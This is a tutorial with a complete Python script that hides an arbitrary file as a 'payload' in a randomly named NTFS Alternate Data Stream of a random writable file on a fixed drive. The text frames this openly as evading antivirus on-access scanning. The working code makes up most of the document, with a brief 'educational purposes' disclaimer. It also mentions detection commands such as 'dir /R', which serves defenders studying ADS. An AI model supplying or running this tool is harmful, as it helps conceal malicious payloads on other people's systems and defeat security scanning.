
Alternate Data Streams File Hider In Python

Alternate Data Streams (ADS) are an NTFS feature that lets a file carry additional named streams of data next to its default, unnamed stream; data placed in a named stream does not show up in the file's reported size or in a normal directory listing. Historically, few anti-virus products inspected these streams, so launching a new process from an ADS could sometimes slip past an 'on-access' scan engine. Treat this as evasion of older scanners rather than a reliable hiding place: streams are trivially enumerated (e.g. `dir /R`, or PowerShell `Get-Item -Stream *`) and current engines increasingly scan them. The code below uses the Windows API (kernel32.dll again) to find fixed drives and write a file into an ADS of an existing file on one of them.

Steps to follow:
1) Enumerate all the drive letters present
2) Keep only fixed (local, non-removable) drives
3) Collect the first 1000 files found on a randomly chosen fixed drive
4) Pick one of those files at random and check that it is writable
5) Write the payload into a new, randomly named stream of that file

NOTE: An ADS exists only as part of its host file on an NTFS volume. It is lost when the host file is archived (zip etc.), e-mailed, or copied to a FAT/exFAT volume or any other non-NTFS location; it survives only NTFS-to-NTFS copies and moves, so once in place it can only be moved between NTFS locations.


# Banner and usage line, printed before anything else happens.  The final
# "\n" entry deliberately produces an extra blank line, as before.
for _line in (
    "[+] Advance Data Stream Hider by Y",
    "[+] Will hide selected file in random ADS on the writable drive",
    "[+] contact : If you know me then give me a shout",
    "[+] usage: ./ads_hide.py <FILE_PATH>",
    "\n",
):
    print(_line)

# define imports
import ctypes
import os
import random
import stat
import string
import sys  # was "import sys.argv": not a module, so the original aborted with ImportError before doing anything

#define kernel32 dll
kernel32 = ctypes.windll.kernel32


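def getDrives():
    """Return the root paths (e.g. ``'C:\\'``) of every logical drive letter present.

    Decodes the bitmask returned by ``GetLogicalDrives``: bit 0 is A:, bit 1
    is B:, ... bit 25 is Z:.  The original loop started at bit 1 and so never
    reported an A: drive; all 26 bits are checked now.

    Returns:
        list[str]: drive roots in A..Z order.
    """
    print("[+] Enumerating the list of current partitions")
    drivebits = kernel32.GetLogicalDrives()
    partition_list = []
    for bit in range(26):
        if drivebits & (1 << bit):
            drive_letter = '%c:\\' % chr(ord('A') + bit)
            partition_list.append(drive_letter)
            print("\t[+]Found drive: %s" % drive_letter)
    return partition_list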

def getDriveInfo(drives):
    """Filter *drives* down to fixed (local, non-removable) drives.

    Queries ``GetDriveTypeA`` for each root path and keeps only those that
    report ``DRIVE_FIXED`` (3).  Remote (4), removable, CD-ROM and unknown
    drives are dropped.

    Args:
        drives: drive root strings such as ``'C:\\'``.
    Returns:
        list[str]: the fixed-drive roots, in the order given.
    """
    DRIVE_FIXED = 3
    fixed = []
    for root in drives:
        # NOTE(review): ANSI variant, so the root is passed as a str (Python 2).
        if kernel32.GetDriveTypeA(root) != DRIVE_FIXED:
            continue
        print("\t[+] Found Fixed Drive :  %s" % root)
        fixed.append(root)
    return fixed

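def genRandomPath(drive, limit=1000):
    """Walk *drive* and return up to *limit* file paths found under it.

    The walk stops as soon as *limit* paths have been collected, to keep the
    scan fast on large volumes.  If the tree holds fewer than *limit* files
    the shorter list is returned -- the original fell off the end of its loop
    and returned ``None`` in that case, which then crashed the caller.
    Directories ``os.walk`` cannot read are skipped silently.

    Args:
        drive: root directory to scan.
        limit: maximum number of paths to collect (default 1000, as before).
    Returns:
        list[str]: full paths, at most *limit* of them (empty if none found).
    """
    paths = []
    for dirname, _subdirs, filenames in os.walk(drive):
        for nm in filenames:
            if len(paths) >= limit:
                return paths
            paths.append(os.path.join(dirname, nm))
    return paths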

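def getRandomDrive(list_writable_drives):
    """Pick one drive root at random from *list_writable_drives*.

    Raises:
        ValueError: when the list is empty (the original also raised
            ``ValueError``, but from inside ``randrange`` with an unhelpful
            "empty range" message).
    """
    print("[+] Selecting Partition")
    if not list_writable_drives:
        raise ValueError("no fixed drive found to write to")
    return random.choice(list_writable_drives)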

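def selectRandomPath(limit, list):
    """Return a random entry from the first *limit* items of *list*.

    *limit* is clamped to ``len(list)``, so a list shorter than the requested
    window no longer raises ``IndexError`` (the original indexed
    ``randrange(0, limit)`` blindly).  The second parameter keeps its
    original name for call compatibility even though it shadows the builtin.

    Raises:
        ValueError: when the list is empty or *limit* is not positive.
    """
    print("[+] Choosing $PATH")
    candidates = list
    window = min(limit, len(candidates))
    if window <= 0:
        raise ValueError("no candidate paths to choose from")
    return candidates[random.randrange(0, window)]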

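def isFileWritable(filepath):
    """Return True if the current user may write to *filepath*.

    Uses ``os.access(..., os.W_OK)``, which on Windows honours the file's
    read-only attribute -- the thing that actually blocks opening a new
    stream on it.  The original tested the group-write bit of ``st_mode``,
    which on NTFS is just a mirror of the owner bit and on POSIX says nothing
    about the *current* user.  A path that does not exist is reported as not
    writable instead of raising ``OSError``.
    """
    print("[+] Checking File Write Permission")
    return os.access(filepath, os.W_OK)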

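def write(file, path):
    """Copy *file* into a randomly named alternate data stream of *path*.

    The stream is ``<path>:<random name><extension of file>``, where the
    random name is 4-19 ASCII letters/digits.  The copy uses plain file I/O
    instead of the original ``type src > dst:stream`` shell command, which
    broke on paths containing spaces or shell metacharacters, let a crafted
    argument inject arbitrary commands, and ignored the command's exit
    status.  ``os.path.splitext`` replaces the old ``split(".")``, which
    raised on names with zero or several dots.

    Args:
        file: source file to hide (name kept for compatibility although it
            shadows the builtin).
        path: existing host file whose stream is written.
    Returns:
        str: the full stream path that was written (new; the original
        returned ``None``).
    Raises:
        IOError / OSError: if either side cannot be opened.
    """
    extension = os.path.splitext(str(file))[1]  # "" or ".ext", dot included
    alphabet = string.ascii_uppercase + string.digits + string.ascii_lowercase
    name = ''.join(random.choice(alphabet) for _ in range(random.randrange(4, 20)))
    stream = "%s:%s%s" % (path, name, extension)
    with open(file, 'rb') as src, open(stream, 'wb') as dst:
        # chunked copy so large payloads are not read into memory at once
        while True:
            chunk = src.read(65536)
            if not chunk:
                break
            dst.write(chunk)
    print("[+] File Hidden In: %s" % stream)
    return stream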

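def ADS_HIDE(FILE_PATH):
    """Hide *FILE_PATH* in an ADS of a random writable file on a random fixed drive.

    Walks the chosen drive once (the original re-walked it for its single
    retry), shuffles the candidate files and uses the first one the current
    user can write to.

    Raises:
        ValueError: when there is no fixed drive, no file on it, or no
            writable candidate -- the original wrote to its second pick
            unconditionally, even when that one had failed the check too.
    """
    drives = getDrives()
    print("[+] Checking Drive Type")
    list_to_write = getDriveInfo(drives)
    drive_to_search = getRandomDrive(list_to_write)
    print("[+] Constructing ADS")
    candidates = genRandomPath(drive_to_search)
    if not candidates:
        raise ValueError("no files found on %s" % drive_to_search)
    # try candidates in random order so one read-only pick does not end the run
    random.shuffle(candidates)
    for path in candidates:
        if isFileWritable(path):
            print("[+] Writing to ADS")
            write(FILE_PATH, path)
            return
    raise ValueError("no writable file found on %s" % drive_to_search)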
    


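if __name__ == "__main__":
    # Require the file argument: the original indexed sys.argv[1] blindly and
    # died with IndexError when run without one.
    if len(sys.argv) < 2:
        print("[!] usage: ./ads_hide.py <FILE_PATH>")
        sys.exit(1)
    FILE = str(sys.argv[1])
    if not os.path.isfile(FILE):
        print("[!] not a regular file: %s" % FILE)
        sys.exit(1)
    ADS_HIDE(FILE)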


Again, this code is here for educational purposes only.